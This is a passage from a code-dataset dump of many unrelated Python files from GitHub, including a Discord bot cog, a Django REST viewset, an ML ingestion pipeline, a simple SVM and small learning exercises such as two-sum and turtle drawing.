Button(root,text='Enter',command=printtext)\nb.pack(side=TOP)\ntext.pack(expand=True, fill='both')\n\nroot.mainloop()\n\n\n# In[ ]:\n\n\n\n","repo_name":"starlordsaraf/Insurance-Claims-Prediction-CDSAML","sub_path":"K+fold+on+classify+7.py","file_name":"K+fold+on+classify+7.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13777991981","text":"from asyncio import sleep\nfrom datetime import datetime, timezone, timedelta\n\nfrom discord.errors import NotFound\nfrom discord.ext import commands\n\nfrom core.message_constructor import MessageConstructor as MC\n\n\nclass Overseer(commands.Cog):\n \"\"\"Overseer Cog\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.tzinfo = timezone(timedelta(hours=3))\n\n async def respond(self, ctx, **kvargs):\n reply = await ctx.message.reply(**kvargs)\n await sleep(15)\n try:\n await reply.delete()\n except NotFound:\n pass\n try:\n await ctx.message.delete()\n except NotFound:\n pass\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx, error):\n if isinstance(error, commands.CommandInvokeError):\n i = str(error).find(\"CommandInputError:\")\n if i != -1:\n message_body = MC.error(str(error)[i + 18:])\n await self.respond(ctx, **message_body)\n else:\n raise error\n elif isinstance(error, commands.MissingRequiredArgument):\n message_body = MC.error(\"Missing arguments.\")\n await self.respond(ctx, **message_body)\n\n @commands.Cog.listener()\n async def on_command(self, ctx):\n time = datetime.now(self.tzinfo).strftime(\"%Y-%m-%d-%H:%M:%S\")\n guild = str(ctx.guild.id)\n author = f\"{ctx.author.name}#{ctx.author.discriminator}\"\n command = ctx.command.qualified_name\n params = \", \".join(ctx.args[2:])\n with open(\"data/commands.log\", \"a\") as f:\n f.write(f\"{time} {guild} {author} {command} {params}\\n\")\n","repo_name":"Fudge1234513/judgedeath2","sub_path":"cog_overseer.py","file_name":"cog_overseer.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10259630765","text":"import sys\nimport os\nfrom src.exception import CustomException\nfrom src.logger import logging\nfrom src.utils import read_data_from_mongodb\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom dataclasses import dataclass\n\nfrom src.components.data_transformation import DataTransformation\nfrom src.components.data_transformation import DataTransformationConfig\n\nfrom 
src.components.model_trainer import ModelTrainerConfig\nfrom src.components.model_trainer import ModelTrainer\n\n@dataclass\nclass DataIngestionConfig:\n train_data_path : str = os.path.join('artifacts','train.parquet')\n test_data_path : str = os.path.join('artifacts','test.parquet')\n raw_data_path : str = os.path.join('artifacts','data.parquet')\n\n\nclass DataIngestion:\n def __init__(self):\n self.ingestion_config = DataIngestionConfig()\n\n def initiate_data_ingestion(self):\n logging.info('Entered the data ingestion method')\n\n try:\n #df = pd.read_parquet('data/data_for_model_prep.csv')\n df = read_data_from_mongodb(database_name='PoliceIncidents',table_name='data_model_training')\n logging.info('Read the dataset from mongo db')\n\n os.makedirs(os.path.dirname(self.ingestion_config.train_data_path),exist_ok=True)\n df.to_parquet(self.ingestion_config.raw_data_path)\n\n logging.info('Train test split initiated')\n train_set, test_set = train_test_split(df,test_size=0.2,random_state=42)\n\n train_set.to_parquet(self.ingestion_config.train_data_path)\n test_set.to_parquet(self.ingestion_config.test_data_path)\n\n logging.info('Data ingestion completed')\n\n return (\n self.ingestion_config.train_data_path,\n self.ingestion_config.test_data_path\n\n )\n except Exception as e:\n raise CustomException(e,sys)\n \n\nif __name__==\"__main__\":\n obj=DataIngestion()\n train_data,test_data=obj.initiate_data_ingestion()\n\n data_transformation=DataTransformation()\n train_arr,test_arr,_=data_transformation.initiate_data_transformation(train_data,test_data)\n\n modeltrainer=ModelTrainer()\n print(modeltrainer.initiate_model_trainer(train_arr,test_arr))","repo_name":"pjeena/Crime-rate-prediction-using-CI-CD-pipeline","sub_path":"src/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"269016589","text":"import nbformat as nbf\nfrom typing import Optional\nfrom random_filename import get_random_name\n\n\ndef create_notebook(text_content, output_file: Optional[str] = 'output.ipynb'):\n\n\n \n if output_file == 'output.ipynb' or output_file == None:\n output_file = get_random_name()\n \n # Initialize notebook object\n nb = nbf.v4.new_notebook()\n\n # Process the text content\n lines = text_content.split(\"\\n\")\n in_code_block = False\n code_lines = []\n markdown_lines = []\n\n for line in lines:\n if not in_code_block and \"```python\" in line:\n in_code_block = True\n if markdown_lines:\n markdown_cell = nbf.v4.new_markdown_cell(\"\\n\".join(markdown_lines))\n nb.cells.append(markdown_cell)\n markdown_lines.clear()\n elif in_code_block and \"```\" in line:\n in_code_block = False\n if code_lines:\n code_cell = nbf.v4.new_code_cell(\"\\n\".join(code_lines))\n nb.cells.append(code_cell)\n code_lines.clear()\n elif in_code_block:\n code_lines.append(line)\n else:\n markdown_lines.append(line)\n\n with open(output_file, \"w\", encoding=\"utf-8\") as f:\n nbf.write(nb, f)\n\n return output_file\n\n\n\ndef create_notebook_from_file(text_file, output_file: Optional[str] = 'output.ipynb'):\n\n with open(text_file, \"r\", encoding=\"utf-8\") as f:\n text_content = f.read()\n notebook = create_notebook(text_content, output_file)\n\n return notebook\n 
\n\n","repo_name":"JamesFincher/nbAPI","sub_path":"dev_resources/testing/utils_create_notebook/create_notebook.py","file_name":"create_notebook.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71582745324","text":"import Controller\nimport Model\nimport View\n\ndef Choise():\n print('Вы хотите ввести выражение?')\n choise = int(input('1.Да \\n'\n '2.Нет\\n'\n 'Ваш выбор: '))\n while choise == 1:\n Model.expression_list = input('Введите выражение: ')\n Controller.res_expression(Model.expression_list)\n break\n else:\n Model.init_first()\n while True:\n if Model.init_ops():\n break\n Model.init_second()\n Controller.oper()\n View.print_total()\n Model.first = Model.result\n\nChoise()","repo_name":"katerinapavlova13/Seminar7_Calculate_dz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17827827336","text":"import uuid\nimport datetime\nfrom flask import Flask\nfrom flask import render_template\n\n\ndef AD():\n ret = {}\n ret['adId'] = str(uuid.uuid4())\n ret['campaignId'] = 0\n ret['keyWords'] = []\n ret['relevanceScore'] = 0\n ret['pClick'] = 0\n ret['bidPrice'] = 0\n ret['rankScore'] = 0\n ret['qualityScore'] = 0\n ret['costPerClick'] = 0\n ret['position'] = 0\n ret['title'] = ''\n ret['price'] = 0\n ret['thumbnail'] = ''\n ret['description'] = ''\n ret['brand'] = ''\n ret['detail_url'] = ''\n ret['query'] = ''\n ret['query_group_id'] = 0\n ret['category'] = ''\n return ret\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n data = {\n 'tm': datetime.datetime.now(),\n 'ads': [AD(), AD(), AD(), AD(), AD(), AD()]\n }\n return render_template('mission4_template.html', data=data)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"yusenjeng/amazon_crawler","sub_path":"3. 
search_service/mission4/mission4.py","file_name":"mission4.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28499498569","text":"import numpy as np\nimport leidenalg\nimport igraph as ig\n\nfrom sklearn.neighbors import kneighbors_graph\n\n\ndef louvain_clusters(latent, k=10, rands=0):\n nn_matrix = kneighbors_graph(latent, k)\n rows, cols = np.where(nn_matrix.todense() == 1)\n edges = [(row, col) for row, col in zip(rows, cols)]\n g = ig.Graph()\n g.add_vertices(latent.shape[0])\n g.add_edges(edges)\n res = leidenalg.find_partition(g, leidenalg.ModularityVertexPartition, seed=rands)\n clusters = np.asarray(res.membership)\n return clusters\n","repo_name":"suswei/single-cell-rna-seq","sub_path":"scvi/inference/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"33684567807","text":"from setuptools import setup, find_packages\n\nversion = '0.1'\n\nwith open('README.rst', 'rt') as readme:\n description = readme.read()\n\nwith open('CHANGES.txt', 'rt') as changes:\n history = changes.read()\n\n\nsetup(\n name='keyboardtools',\n version=version,\n description=\"\",\n long_description=description + '\\n' + history,\n # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=['Development Status :: 1 - Pre-Alpha',\n 'Programming Language :: Python :: 3.4',\n 'License :: OSI Approved :: MIT License',\n ],\n keywords='',\n author='Lennart Regebro',\n author_email='regebro@gmail.com',\n url='https://github.com/regebro/keyboardtools',\n license='MIT',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n test_suite='tests',\n entry_points={\n 'console_scripts': [\n 'kbt-logkeys=keyboardtools.analyze:logkeys',\n ],\n }\n)\n","repo_name":"regebro/keyboardtools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"18449230784","text":"import logging\nimport json\n\nfrom django import http\n\n\nlog = logging.getLogger(__name__)\n\nPLAIN_TEXT_OUTPUT_TYPE = 'PlainText'\nSSML_OUTPUT_TYPE = 'SSML'\n\nSIMPLE_CARD = 'Simple'\nLINK_ACCOUNT_CARD = 'LinkAccount'\n\n\ndef create_simple_card(title, content):\n return {\n \"type\": SIMPLE_CARD,\n \"title\": title,\n \"content\": content,\n }\n\n\ndef create_link_account_card():\n return {\"type\": LINK_ACCOUNT_CARD, }\n\n\nclass EchoResponse(http.HttpResponse):\n def __init__(self, output_speech, *args, **kwargs):\n kwargs.setdefault('content_type', 'application/json;charset=UTF-8')\n\n reprompt = kwargs.pop('reprompt', None)\n if reprompt:\n reprompt = self.get_speech_object(reprompt)\n\n response_body = {\n \"version\": \"1.0\",\n \"response\": {\n \"outputSpeech\": self.get_speech_object(output_speech),\n \"card\": kwargs.pop('card', None),\n \"reprompt\": reprompt,\n \"shouldEndSession\": kwargs.pop('should_end_session', True)\n },\n \"sessionAttributes\": kwargs.pop('session', {})\n }\n\n log.debug(response_body)\n data = json.dumps(response_body)\n super(EchoResponse, self).__init__(content=data, **kwargs)\n\n def is_ssml(self, text):\n text = text.strip()\n return text.startswith('') and text.endswith('')\n\n def get_speech_object(self, text):\n if self.is_ssml(text):\n return {\n \"type\": 
SSML_OUTPUT_TYPE,\n \"ssml\": text\n }\n else:\n return {\n \"type\": PLAIN_TEXT_OUTPUT_TYPE,\n \"text\": text\n }\n","repo_name":"bunchesofdonald/django-echo","sub_path":"echo/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"39518064147","text":"from copy import copy\nfrom uuid import UUID\n\nfrom django.db import transaction\nfrom django.db.models import Q\nfrom django.apps import apps\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError as DjangoValidationError\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rest_framework import viewsets, status as response_status\nfrom rest_framework.exceptions import NotFound, ValidationError\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.throttling import AnonRateThrottle, UserRateThrottle\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import LimitOffsetPagination\n\nfrom .serializers import (\n CreateSpreadSerializer,\n ListSpreadSerializer,\n RetrieveSpreadSerializer,\n RetrievePublicSpreadSerializer,\n UpdateSpreadSerializer\n)\nfrom ....helpers import build_result_pagination\n\nSpread = apps.get_registered_model('feeder', 'Spread')\n\n# Define to avoid used ...().paginate__\n_PAGINATOR = LimitOffsetPagination()\n\n\nclass BaseViewSet(viewsets.ViewSet):\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.context = dict()\n\n def initialize_request(self, request, *args, **kwargs):\n self.context.update({'request': request})\n return super().initialize_request(request, *args, **kwargs)\n\n\nclass SpreadViewSet(BaseViewSet):\n \"\"\"\n GET\n -----\n\n .../spreads/?fragment=uuid4&broadcast=uuid4\n\n\n POST\n -----\n\n { \n \"content_type\": \"fragment\",\n \"object_id\": \"uuid4\",\n \"allocation\": 14,\n \"expiry_at\": \"Date time\",\n \"introduction\": \"A something...\"\n }\n\n\n PATCH\n -----\n\n {\n \"allocation\": 14,\n \"expiry_at\": \"Date time\",\n \"introduction\": \"A something...\"\n }\n \"\"\"\n lookup_field = 'uuid'\n permission_classes = (IsAuthenticated,)\n throttle_classes = (UserRateThrottle, AnonRateThrottle,)\n permission_action = {\n 'retrieve': (AllowAny,),\n }\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns\n the list of permissions that this view requires.\n \"\"\"\n try:\n # return permission_classes depending on `action`\n return [permission() for permission in self.permission_action[self.action]]\n except KeyError:\n # action is not set return default permission_classes\n return [permission() for permission in self.permission_classes]\n\n def queryset(self):\n return Spread.objects \\\n .prefetch_related('content_type', 'content_object') \\\n .select_related('content_type') \\\n .filter(\n Q(fragment__user_id=self.request.user.id)\n | Q(broadcast__user_id=self.request.user.id)\n )\n\n def queryset_instance(self, uuid, for_update=False):\n try:\n if for_update:\n return self.queryset().select_for_update().get(uuid=uuid)\n return self.queryset().get(uuid=uuid)\n except ObjectDoesNotExist:\n raise NotFound()\n\n def queryset_public_instance(self, identifier):\n try:\n return self.queryset().get(identifier=identifier)\n except ObjectDoesNotExist:\n raise NotFound()\n\n @transaction.atomic\n def create(self, request, format=None):\n serializer = CreateSpreadSerializer(\n data=request.data,\n context=self.context\n )\n\n if 
serializer.is_valid(raise_exception=True):\n try:\n serializer.save()\n except DjangoValidationError as e:\n raise ValidationError(detail=str(e))\n return Response(serializer.data, status=response_status.HTTP_201_CREATED)\n return Response(serializer.errors, status=response_status.HTTP_406_NOT_ACCEPTABLE)\n\n @transaction.atomic\n def partial_update(self, request, uuid=None, format=None):\n instance = self.queryset_instance(uuid, for_update=True)\n serializer = UpdateSpreadSerializer(\n instance,\n data=request.data,\n context=self.context,\n partial=True\n )\n\n if serializer.is_valid(raise_exception=True):\n try:\n serializer.save()\n except DjangoValidationError as e:\n raise ValidationError(detail=str(e))\n return Response(serializer.data, status=response_status.HTTP_200_OK)\n return Response(serializer.errors, status=response_status.HTTP_406_NOT_ACCEPTABLE)\n\n @transaction.atomic()\n def delete(self, request, uuid=None):\n try:\n instance = self.queryset().get(uuid=uuid)\n except ObjectDoesNotExist:\n raise NotFound()\n\n # copy for response\n instance_copy = copy(instance)\n\n # run delete\n instance.delete()\n\n # return object\n serializer = RetrieveSpreadSerializer(\n instance_copy,\n context=self.context\n )\n return Response(serializer.data, status=response_status.HTTP_200_OK)\n\n def list(self, request, format=None):\n queryset = self.queryset()\n fragment = request.query_params.get('fragment', None)\n broadcast = request.query_params.get('broadcast', None)\n\n if not fragment and not broadcast:\n raise ValidationError(detail={\n 'param': _(\"Fragment or Broadcast required\")\n })\n\n if fragment and broadcast:\n raise ValidationError(detail={\n 'param': _(\"Can't use both Fragment and Broadcast\")\n })\n\n try:\n # validate uuid here\n # read this docs: https://docs.djangoproject.com/en/3.2/ref/contrib/contenttypes/\n if fragment:\n queryset = queryset.filter(\n Q(fragment__isnull=False) & Q(fragment__uuid=fragment)\n )\n\n if broadcast:\n queryset = queryset.filter(\n Q(broadcast__isnull=False) & Q(broadcast__uuid=broadcast)\n )\n except DjangoValidationError as e:\n raise ValidationError(detail={\n 'param': str(e)\n })\n\n paginator = _PAGINATOR.paginate_queryset(queryset, request)\n serializer = ListSpreadSerializer(\n paginator,\n context=self.context,\n many=True\n )\n\n results = build_result_pagination(self, _PAGINATOR, serializer)\n return Response(results, status=response_status.HTTP_200_OK)\n\n def retrieve(self, request, uuid=None, format=None):\n valid_uuid = True\n try:\n UUID(uuid).version\n except ValueError:\n valid_uuid = False\n\n if valid_uuid:\n instance = self.queryset_instance(uuid)\n serializer = RetrieveSpreadSerializer(\n instance,\n context=self.context\n )\n else:\n instance = self.queryset_public_instance(uuid)\n serializer = RetrievePublicSpreadSerializer(\n instance,\n context=self.context\n )\n\n return Response(serializer.data, status=response_status.HTTP_200_OK)\n","repo_name":"PUYUP/kirimsaran","sub_path":"apps/feeder/api/v1/spread/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41257751613","text":"\n\n\nfrom sklearn.base import BaseEstimator\nimport numpy as np\nimport cvxopt.solvers\ncvxopt.solvers.options['show_progress'] = False\n\ndef compute_w(multipliers, X, y):\n return sum(multipliers[i] * y[i] * X[i] for i in range(len(y)))\n\ndef compute_b(w, X, y):\n return sum([y[i] - np.dot(w, X[i]) for i in 
range(len(X))])/len(X)\n\n\n\n\nclass SVC(BaseEstimator):\n\n def __init__(self):\n pass\n\n\n def get_K(self, X):\n \"\"\"\n https://cvxopt.org/examples/tutorial/qp.html\n If X = array([ [0, 1],\n [2, 3],\n [4, 5],\n [6, 7],\n [8, 9]])\n K = \n array([ 1, 3, 5, 7, 9, 3, 13, 23, 33, 43, 5, 23, 41,\n 59, 77, 7, 33, 59, 85, 111, 9, 43, 77, 111, 145])\n reshape as \n array([ [ 1, 3, 5, 7, 9],\n [ 3, 13, 23, 33, 43],\n [ 5, 23, 41, 59, 77],\n [ 7, 33, 59, 85, 111],\n [ 9, 43, 77, 111, 145]])\n \"\"\"\n K = np.array([np.dot(X[i], X[j])\n for j in range(self.m)\n for i in range(self.m)]).reshape((self.m, self.m))\n return K\n\n\n\n def fit(self, X, y):\n \"\"\"\n convert y into -1, 1, dtype: float\n \"\"\"\n self.classes_, y = np.unique(y, return_inverse=True)\n y = np.where(y == 0, -1, y).astype(np.float64)\n\n self.m, self.n = X.shape\n K = self.get_K(X)\n\n\n P = cvxopt.matrix(np.outer(y, y) * K)\n q = cvxopt.matrix(-1 * np.ones(self.m))\n # print(P.size, q.size)\n # Equality constraints\n A = cvxopt.matrix(y, (1, self.m))\n b = cvxopt.matrix(0.0)\n # Inequality constraints\n G = cvxopt.matrix(np.diag(-1 * np.ones(self.m)))\n h = cvxopt.matrix(np.zeros(self.m))\n\n # Solve the problem\n solution = cvxopt.solvers.qp(P, q, G, h, A, b)\n # Lagrange multipliers\n multipliers = np.ravel(solution['x'])\n\n has_positive_multiplier = multipliers > 1e-7\n sv_multipliers = multipliers[has_positive_multiplier]\n # print(sv_multipliers)\n support_vectors = X[has_positive_multiplier]\n support_vectors_y = y[has_positive_multiplier]\n\n w = compute_w(multipliers, X, y)\n self.coef_ = compute_w(sv_multipliers, support_vectors, support_vectors_y)\n self.intercept_ = compute_b(w, support_vectors, support_vectors_y) # -9.666668268506335\n\n\n\n def predict(self, X):\n y = np.dot(X, self.coef_) + self.intercept_\n return self.classes_.take(np.asarray(np.where(y > 0, 1, 0), dtype=np.intp))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nickyfoto/ml-learn","sub_path":"src/learn/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9815683852","text":"import turtle as t\r\nfrom turtle import Screen\r\nimport random\r\n\r\nturt = t.Turtle()\r\nturt_screen = Screen()\r\nturt_screen.setup(width=600,height=600)\r\nt.colormode(255)\r\ncolor_list = [(250, 249, 249), (207, 165, 165), (164, 169, 169), (140, 48, 48), (244, 79, 79), (3, 144, 144), (241, 66, 66), (249, 220, 220), (2, 142, 142), (162, 55, 55)]\r\nturt.speed(10)\r\n\r\ndistance = 0\r\n\r\ndef initial_position(distance):\r\n turt.hideturtle()\r\n turt.penup()\r\n turt.goto(-250,(-250+distance))\r\n turt.pendown()\r\n\r\n\r\nfor iter1 in range(10):\r\n initial_position(distance)\r\n distance += 50\r\n for iter2 in range(10):\r\n turt.dot(20,random.choice(color_list))\r\n turt.penup()\r\n turt.forward(50)\r\n\r\n\r\nturt_screen.exitonclick()\r\n","repo_name":"Wewilo/100-Days-of-Code-Python","sub_path":"Day 18 Hirst Painting/hirst_painting.py","file_name":"hirst_painting.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23513002531","text":"menu = [\r\n [\"egg\", \"spam\", \"bacon\"],\r\n [\"egg\", \"sausage\", \"bacon\"],\r\n [\"egg\", \"spam\"],\r\n [\"egg\", \"bacon\", \"spam\"],\r\n [\"egg\", \"bacon\", \"sausage\", \"spam\"],\r\n [\"spam\", \"bacon\", \"sausage\", \"spam\"],\r\n [\"spam\", \"egg\", \"spam\", \"spam\", \"bacon\", 
\"spam\"],\r\n    [\"spam\", \"egg\", \"sausage\", \"spam\"],\r\n    [\"chicken\", \"chips\"]\r\n]\r\nmeals = []\r\nfor meal in menu:\r\n    if \"spam\" not in meal:\r\n        # print(meal)\r\n        meals.append(meal)\r\n    else:\r\n        meals.append(\"a meal was skipped\")\r\n# an if clause or filter added to the comprehension\r\nmeals = [meal for meal in menu if \"spam\" not in meal and \"chicken\" not in meal]\r\nprint(meals)\r\n\r\n# More readable than the fussy_meals below\r\nfussy_meals = [meal for meal in menu if \"spam\" in meal or \"eggs\" in meal if not\r\n               (\"bacon\" in meal and \"sausage\" in meal)]\r\nprint(fussy_meals)\r\n\r\n\r\n\r\nfussy_meals = [meal for meal in menu if\r\n               (\"spam\" in meal or \"eggs\" in meal) and not (\"bacon\" in meal and \"sausage\" in meal)]\r\nprint(fussy_meals)\r\n\r\n# CONDITIONAL COMPREHENSIONS\r\n\r\n# [meal for meal in menu if \"spam\" not in meal]\r\n# expression iteration filter(s)\r\n\r\n# This conditional list comprehension now specifies a filter, extending the incomplete def above line 17\r\n\r\n# A comprehension has an expression, in this example, the value of a meal.\r\n# After the comprehension comes the iteration which is followed by one or more filters.\r\n# [expression iteration filter(s)]","repo_name":"brunoreyes/python_fundamentals","sub_path":"condcomp.py","file_name":"condcomp.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19644459654","text":"import os\nimport PIL.Image as pli\nimport numpy as np\nimport scipy.io as sio\n\n\nclass CountLocations:\n    def __init__(self, **kwargs):\n        self.data = self.get_full_path(kwargs.pop('gt_data'))\n        self.numfiles = kwargs.pop('numfiles')\n\n    def get_gt(self, index, count):\n        d = sio.loadmat(\n            os.path.join(self.data, 'IMG_{}_{}.mat'.format(index, count)))\n        dt = d['final_gt']\n        return dt\n\n    def get_full_path(self, rel_path, makedir=False):\n        directory = os.path.join(\n            os.path.dirname(\n                os.path.abspath(\n                    __file__\n                )\n            ),\n            rel_path\n        )\n        if makedir:\n            if not os.path.exists(directory):\n                os.makedirs(directory)\n\n        return directory\n\n    def count_locations(self):\n        counts = {}\n        for i in range(1, self.numfiles + 1):\n            count = 0\n            for j in range(1, 10):\n                gt = self.get_gt(i, j)\n                _loc = gt[gt > 0]\n                count += len(_loc)\n            counts[i] = count \n        return counts\n\nif __name__ == '__main__':\n    print(\"UCF Data\")\n    t = CountLocations(**{\n        'gt_data': 'ucf_data/gt/',\n        'numfiles': 50\n    })\n    counts = t.count_locations()\n    _min = min(counts, key=counts.get)\n    _max = max(counts, key=counts.get)\n\n    print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n    print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n    print()\n    print(\"ST Data A Test\")\n\n    t = CountLocations(**{\n        'gt_data': 'st_data_A_test/gt/',\n        'numfiles': 182\n    })\n    counts = t.count_locations()\n    _min = min(counts, key=counts.get)\n    _max = max(counts, key=counts.get)\n\n\n    print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n    print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n\n    print()\n    print(\"ST Data A Train\")\n\n    t = CountLocations(**{\n        'gt_data': 'st_data_A_train/gt/',\n        'numfiles': 300\n    })\n    counts = t.count_locations()\n    _min = min(counts, key=counts.get)\n    _max = max(counts, key=counts.get)\n\n\n    print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n    print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n\n    print()\n    print(\"ST Data B Test\")\n\n    t = CountLocations(**{\n        'gt_data': 
'st_data_B_test/gt/',\n        'numfiles': 316\n    })\n    counts = t.count_locations()\n    _min = min(counts, key=counts.get)\n    _max = max(counts, key=counts.get)\n\n\n    print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n    print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n    print()\n    print(\"ST Data B Train\")\n\n    t = CountLocations(**{\n        'gt_data': 'st_data_B_train/gt/',\n        'numfiles': 400\n    })\n    counts = t.count_locations()\n    _min = min(counts, key=counts.get)\n    _max = max(counts, key=counts.get)\n\n\n    print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n    print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n    print()\n    print(\"UCSD Data\") \n\n    t = CountLocations(**{\n        'gt_data': 'ucsd_data/gt/',\n        'numfiles': 2000\n    })\n    counts = t.count_locations()\n    _min = min(counts, key=counts.get)\n    _max = max(counts, key=counts.get)\n\n\n    print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n    print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n\n","repo_name":"cvcpp1/data","sub_path":"count_locations.py","file_name":"count_locations.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71915289324","text":"import numpy as np\n\ndef get_probs_from_CPTs(sample, fs):\n    probs = []\n\n    for i, f in fs.items():\n        cpt = f.table\n        rvs = f.nb\n        values = []\n        # get the index (variable assignment) of CPT\n        for rv in rvs:\n            value = sample[rv.name]\n            values.append(value)\n\n        values = tuple(values)\n        prob = cpt[values]\n        # avoid the probability of 0 or small value\n        if prob == 0 or prob < 1e-6:\n            prob = 1e-5\n\n        probs.append(prob)\n\n    #print(\"probs for this assignment: \", probs)\n    return probs\n\n\ndef log_likelihood(probs):\n    result = 0\n    for p in probs:\n        result += np.log(p)\n    return result\n\n\n# probs = get_probs_from_CPTs([1,1,1], fs)\n# result = log_likelihood(probs)\n# print(\"log likelihood: \", result)\n\ndef log_likelihood_per_sample(sample, fs):\n    probs = get_probs_from_CPTs(sample, fs)\n    result = log_likelihood(probs)\n    return result\n#\n# result = log_likelihood_per_sample([1,1,1], fs)\n# print(\"log likelihood from learned model: \", result)\n#\n# result = log_likelihood_per_sample([1,1,1], true_fs)\n# print(\"log likelihood from true model: \", result)\n\ndef diff_per_sample(sample, fs, true_fs):\n    LL_learned = log_likelihood_per_sample(sample, fs)\n    LL_true = log_likelihood_per_sample(sample, true_fs)\n    return np.abs(LL_learned - LL_true)\n# print(\"difference: \", diff_per_sample([1,1,1], fs, true_fs))\n\ndef dif_sum(test_file, fs, true_fs):\n    # samples = np.loadtxt(\"data/dataset1/test.txt\", skiprows=1, dtype='int')\n    samples = np.loadtxt(test_file, skiprows=1, dtype='int')\n    total = 0\n    for i in range(samples.shape[0]):\n        dif_sample = diff_per_sample(samples[i], fs, true_fs)\n        # print(f\"{i}th dif: {dif_sample}\")\n        total += dif_sample\n\n    print(\"log likelihood difference: \", total)\n    return total","repo_name":"YoungSean/PGM-Learning-Algorithms","sub_path":"LL_dif.py","file_name":"LL_dif.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1488205294","text":"## This script allows you to rename a directory of files using an excel table containing both the original filenames and desired filenames.\n## Simply enter the directory below, accompanied by an excel file containing headers 'Input Filename' and 'Output Filename', and 
execute.\n\nimport pandas as pd\nimport os\n\ndir = r'' ## Enter directory where files are\n\nfilenameTable = pd.read_excel(r'C:\\Users\\om11\\Documents\\Rename Table.xlsx', ## Rename excel table\n dtype = {'Input Filename': str, 'Output Filename': str}) \n\nfor index, row in filenameTable.iterrows(): # For each row \n input_name = str(row[\"Input Filename\"]) # Input/original filename\n output_name = str(row[\"Output Filename\"]) # Output/new filename\n\n input_name = dir + \"\\\\\" + input_name # \n output_name = dir + \"\\\\\" + output_name # Append filename to directory\n\n os.rename(input_name, output_name) # Rename file from input_name to output_name\n","repo_name":"Dynamack/Python-Scripts","sub_path":"Rename Files.py","file_name":"Rename Files.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14327419098","text":"\nclass Solution(object):\n def twoSum(self, nums, target):\n dic={}\n diff=0\n for i in range(len(nums)):\n diff = target - nums[i]\n if(diff in dic.keys()):\n return [dic[diff],i]\n else:\n dic[nums[i]] = i\n\n","repo_name":"DeepSavla/LeetCode","sub_path":"0001-two-sum/0001-two-sum.py","file_name":"0001-two-sum.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34707173999","text":"#!/usr/bin/env python\n# encoding: UTF-8\n\nimport sys\n\nFOOTNOTE = '.footnote[%s]'\nTITLE = '''\ntemplate: inverse\n%s\n'''\nPAGE = '''\nlayout: 